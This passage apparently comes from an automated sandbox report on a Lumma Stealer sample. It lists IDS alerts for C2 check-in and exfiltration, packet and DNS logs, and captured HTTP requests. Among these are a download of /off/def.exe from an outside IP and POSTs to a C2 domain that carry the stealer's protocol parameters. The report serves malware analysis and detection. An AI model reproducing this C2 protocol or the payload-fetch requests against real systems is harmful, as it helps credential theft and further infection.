| .taggant | 0x2fa000 | 0x3000 | 0x2200 | 71dd37e3a2be642bd2044e6b0e8021b3 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-27T13:03:01.697402+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T13:03:01.697402+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T13:03:02.892163+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T13:03:02.892163+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T13:03:09.964365+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49735 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T13:03:39.473628+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49701 | 172.67.170.64 | 443 | TCP |
| 2024-10-27T13:03:40.380479+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.4 | 49702 | 185.215.113.16 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Oct 27, 2024 13:03:00.438263893 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:00.438328028 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:00.438422918 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:00.441592932 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:00.441625118 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.060684919 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.060813904 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.133431911 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.133469105 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.133795977 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.177561045 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.222076893 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.222116947 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.222364902 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.697134972 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.697230101 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.697314978 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.723208904 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.723248959 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.723267078 CET | 49730 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.723273039 CET | 443 | 49730 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.768987894 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.769076109 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:01.769200087 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.769550085 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:01.769566059 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.383454084 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.383598089 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.397931099 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.397949934 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.398207903 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.399476051 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.399504900 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.399538040 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892185926 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892321110 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892395973 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.892457962 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892642021 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892705917 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.892720938 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892822981 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892874956 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.892887115 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.892988920 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.893048048 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.893059969 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.942641020 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:02.942672014 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:02.989648104 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.009994984 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010180950 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010270119 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.010298967 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010401011 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010485888 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.010498047 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010644913 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010709047 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.010904074 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.010943890 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.010971069 CET | 49731 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.010984898 CET | 443 | 49731 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.135428905 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.135490894 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.135591984 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.136061907 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.136075974 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.736170053 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.736398935 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.737991095 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.738023043 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.738279104 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.739775896 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.739955902 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.739990950 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:03.740093946 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:03.740109921 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:04.583930016 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:04.584032059 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:04.584192991 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:04.584259033 CET | 49732 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:04.584275961 CET | 443 | 49732 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:04.653855085 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:04.653908014 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:04.653987885 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:04.654357910 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:04.654369116 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.287146091 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.287273884 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:05.288634062 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:05.288644075 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.289671898 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.291023970 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:05.291151047 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:05.291187048 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.993275881 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.993506908 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:05.993613958 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:05.993659019 CET | 49733 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:05.993684053 CET | 443 | 49733 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.196243048 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.196362972 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.196521997 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.196829081 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.196863890 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.811537027 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.811786890 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.812906027 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.812941074 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.813168049 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.814279079 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.814418077 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.814465046 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:06.814553976 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:06.814580917 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:07.471227884 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:07.471524000 CET | 443 | 49734 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:07.471687078 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:07.471687078 CET | 49734 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:07.812846899 CET | 49735 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:07.812895060 CET | 443 | 49735 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:07.812982082 CET | 49735 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:07.813364983 CET | 49735 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:07.813375950 CET | 443 | 49735 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:08.436841965 CET | 443 | 49735 | 172.67.170.64 | 192.168.2.4 |
| Oct 27, 2024 13:03:08.436914921 CET | 49735 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:08.438311100 CET | 49735 | 443 | 192.168.2.4 | 172.67.170.64 |
| Oct 27, 2024 13:03:08.438323975 CET | 443 | 49735 | 172.67.170.64 | 192.168.2.4 |
                                                                                                          Oct 27, 2024 13:03:08.438652992 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:08.439954996 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:08.440047026 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:08.440053940 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:09.964402914 CET44349735172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:09.964755058 CET49735443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507086992 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507148981 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:10.507251978 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507625103 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:10.507642984 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.127670050 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.127758980 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.129225016 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.129255056 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.129606009 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.131072044 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.131865978 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.131918907 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132019997 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132066965 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132199049 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132268906 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132424116 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132488012 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132606983 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132653952 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132859945 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132914066 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.132931948 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.132957935 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.133068085 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.133115053 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.133157015 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.133241892 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.133294106 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143738031 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.143904924 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143951893 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143951893 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.143985033 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.143987894 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.144013882 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.144030094 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:11.144035101 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:11.144079924 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.275330067 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.275412083 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.275535107 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.275753021 CET49736443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.275769949 CET44349736172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.350856066 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.350908995 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.350990057 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.351264954 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.351279974 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.953166008 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.953277111 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.954936028 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.954950094 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.955218077 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:38.964051962 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.964083910 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:38.964140892 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.473608971 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.473716974 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.473866940 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:39.474292040 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:39.474318027 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.474343061 CET49701443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:39.474351883 CET44349701172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.477107048 CET4970280192.168.2.4185.215.113.16
                                                                                                          Oct 27, 2024 13:03:39.482537985 CET8049702185.215.113.16192.168.2.4
                                                                                                          Oct 27, 2024 13:03:39.482618093 CET4970280192.168.2.4185.215.113.16
                                                                                                          Oct 27, 2024 13:03:39.482764959 CET4970280192.168.2.4185.215.113.16
                                                                                                          Oct 27, 2024 13:03:39.488646984 CET8049702185.215.113.16192.168.2.4
                                                                                                          Oct 27, 2024 13:03:40.380479097 CET4970280192.168.2.4185.215.113.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 13:03:00.400051117 CET | 61522 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 13:03:00.409723997 CET | 53 | 61522 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 13:03:00.414021015 CET | 53000 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 13:03:00.432473898 CET | 53 | 53000 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 13:03:31.606787920 CET | 53 | 64803 | 162.159.36.2 | 192.168.2.4
Oct 27, 2024 13:03:32.231959105 CET | 61881 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 13:03:32.246361971 CET | 53 | 61881 | 1.1.1.1 | 192.168.2.4
Oct 27, 2024 13:03:38.336869001 CET | 60259 | 53 | 192.168.2.4 | 1.1.1.1
Oct 27, 2024 13:03:38.347940922 CET | 53 | 60259 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 27, 2024 13:03:00.400051117 CET | 192.168.2.4 | 1.1.1.1 | 0xe9e6 | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 27, 2024 13:03:00.414021015 CET | 192.168.2.4 | 1.1.1.1 | 0xb3c | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 27, 2024 13:03:32.231959105 CET | 192.168.2.4 | 1.1.1.1 | 0x1d31 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 27, 2024 13:03:38.336869001 CET | 192.168.2.4 | 1.1.1.1 | 0x3cc3 | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 27, 2024 13:03:00.409723997 CET | 1.1.1.1 | 192.168.2.4 | 0xe9e6 | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 27, 2024 13:03:00.432473898 CET | 1.1.1.1 | 192.168.2.4 | 0xb3c | No error (0) | crisiwarny.store | | 172.67.170.64 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 13:03:00.432473898 CET | 1.1.1.1 | 192.168.2.4 | 0xb3c | No error (0) | crisiwarny.store | | 104.21.95.91 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 13:03:32.246361971 CET | 1.1.1.1 | 192.168.2.4 | 0x1d31 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 27, 2024 13:03:38.347940922 CET | 1.1.1.1 | 192.168.2.4 | 0x3cc3 | No error (0) | crisiwarny.store | | 172.67.170.64 | A (IP address) | IN (0x0001) | false
Oct 27, 2024 13:03:38.347940922 CET | 1.1.1.1 | 192.168.2.4 | 0x3cc3 | No error (0) | crisiwarny.store | | 104.21.95.91 | A (IP address) | IN (0x0001) | false

• crisiwarny.store
• 185.215.113.16
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49702 | 185.215.113.16 | 80 | 7472 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 13:03:39.482764959 CET | 200 | OUT | GET /off/def.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: 185.215.113.16


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.170.64 | 443 | 7472 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 12:03:01 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: crisiwarny.store
2024-10-27 12:03:01 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-27 12:03:01 UTC | 1015 | IN | HTTP/1.1 200 OK
    Date: Sun, 27 Oct 2024 12:03:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=pbbc0r7ugvdv96s29gcm3tm21k; expires=Thu, 20 Feb 2025 05:49:40 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K6p6gXrHjssU7bi6s0MsniGmq1rT4D5B47PqNdPihihxaoW4B%2Bfjv4ZHYHpG%2BE%2FfT7DgHEX8wBEuL%2BCMY5Dtvz%2Bm%2BEF84BVUVgo8RKtI7uXVXybLGmC7AzJm%2FXxvEA0aR7VP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d928a5d083f6b35-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1884&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1519412&cwnd=247&unsent_bytes=0&cid=4a53e3c65d7f8d95&ts=650&x=0"
2024-10-27 12:03:01 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
2024-10-27 12:03:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 172.67.170.64 | 443 | 7472 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-27 12:03:02 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 52
    Host: crisiwarny.store
2024-10-27 12:03:02 UTC | 52 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
